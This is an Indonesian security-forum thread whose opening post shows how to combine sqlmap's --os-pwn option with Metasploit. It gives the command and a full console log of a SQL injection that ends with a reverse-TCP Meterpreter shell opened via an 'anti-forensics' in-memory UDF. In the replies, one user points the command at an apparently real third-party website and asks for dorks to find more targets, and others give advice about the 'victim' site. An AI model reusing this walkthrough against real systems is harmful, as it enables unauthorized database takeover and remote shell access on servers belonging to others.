Integrasi SQLMAP dengan METASPLOIT

zee eichel · 12-06-2012, 04:47 PM

sebagai framework , metasploit memiliki kemampuan untuk terintegrasi dengan berbagai tools lainnya .. sebagai contoh kli ini saya akan mengintegrasikan metasploit dengan sqlmap , tools analisis kerentanan pada database sql :-bd

Untuk tutorial mengenai sqlmap .. dapat anda lihat di

http://indonesianbacktrack.or.id/forum/s...order=desc

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://localhost.com/example.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

Untuk saat ini , maaf saya memakai dracos linux sebagai contoh ...dapat anda sesuaikan dengan os pentest anda

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://situs-target.com/pagevulner.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

some shit for a walker area ...

[shcode=bash][INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[12:9:13] [INFO] fingerprinting the back-end DBMS operating system
[12:9:15] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[16:10:05] [INFO] testing if current user is DBA
[12:10:15] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[12:10:07] [INFO] checking if UDF 'sys_bineval' already exist
[12:10:08] [INFO] checking if UDF 'sys_exec' already exist
[12:10:10] [INFO] detecting back-end DBMS version from its banner
[12:10:12] [INFO] retrieving MySQL base directory absolute path
[12:10:13] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[12:10:15] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:29] [INFO] creating Metasploit Framework 3 multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [xxx.xxx.xxx.xxx]
which local port number do you want to use? [555]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[12:10:15] [INFO] creation in progress ... done
[12:10:16] [INFO] running Metasploit Framework 3 command line interface locally, please wait..

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12655 updated today (2012.12.06)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 555
LHOST => xxx.xxx.xxx.xxx
[*] Started reverse handler on xxx.xxx.xxx.xxx:555
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:9128 -> xxx.xxx.xxx.xxx:555) at Thu Dec 06[/shcode]

meterpreter pun terbuka ..

**ardian** · 12-06-2012, 04:52 PM

mantap om zee.. ane kasih thank ni,,hehehhe

**Clound_Carbelius** · 12-06-2012, 05:01 PM

ane kurang ngerti om Sad

(

(

om om, \m/
ane jalanin ini

Quote:./sqlmap.py -u "http://www.schubertensemble.com/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

kluar pertanyaan kaya di gambar ini
[Image: 55mgci.png]

trus gak kluar Msf nya Undecided

**czeroo_cool** · 12-06-2012, 05:45 PM

(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: ane kurang ngerti om ( (
om om, \m/
ane jalanin ini

Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

kluar pertanyaan kaya di gambar ini

trus gak kluar Msf nya

Kelihatannya itu document file website mu kurang tepat clound, :d

**Clound_Carbelius** · 12-06-2012, 05:50 PM

(12-06-2012, 05:45 PM)czeroo_cool Wrote:
(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: om om, \m/
ane jalanin ini

Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

kluar pertanyaan kaya di gambar ini

trus gak kluar Msf nya

Kelihatannya itu document file website mu kurang tepat clound, :d

eem bgitu :-bd
ane bagi Dork om donk :d :-?

zee eichel · 12-06-2012, 05:57 PM

yang kurang adalah path metasploit om salah tuh .. emang pathnya itu ?

**czeroo_cool** · 12-06-2012, 06:03 PM

(12-06-2012, 05:57 PM)zee eichel Wrote: yang kurang adalah path metasploit om salah tuh .. emang pathnya itu ?

Bisa aja di ganti Folder nya Big Grin

@Clound ... Cari dork nya yang ASP aja om..

**koecroet** · 12-06-2012, 08:16 PM

(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: ane kurang ngerti om ( (
om om, \m/
ane jalanin ini

Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

kluar pertanyaan kaya di gambar ini

trus gak kluar Msf nya

itu karna target ente linux, trus salah masukin letak folder deh ente spertinya. ente harus tau letak direktori dari website victim di filesystem, kalo di linux default nya kan di "/var/www/" tuh

**[H2]** · 12-06-2012, 11:33 PM

wiiihhh, keren nih om..
trus kalo mau nyari tables, colom and dump gimana, masih samakah perintah nya seperti sqlmap...???

**cyberking** · 12-07-2012, 04:34 AM

wkwkw alhamdulillah dapat ilmu lgi Big Grin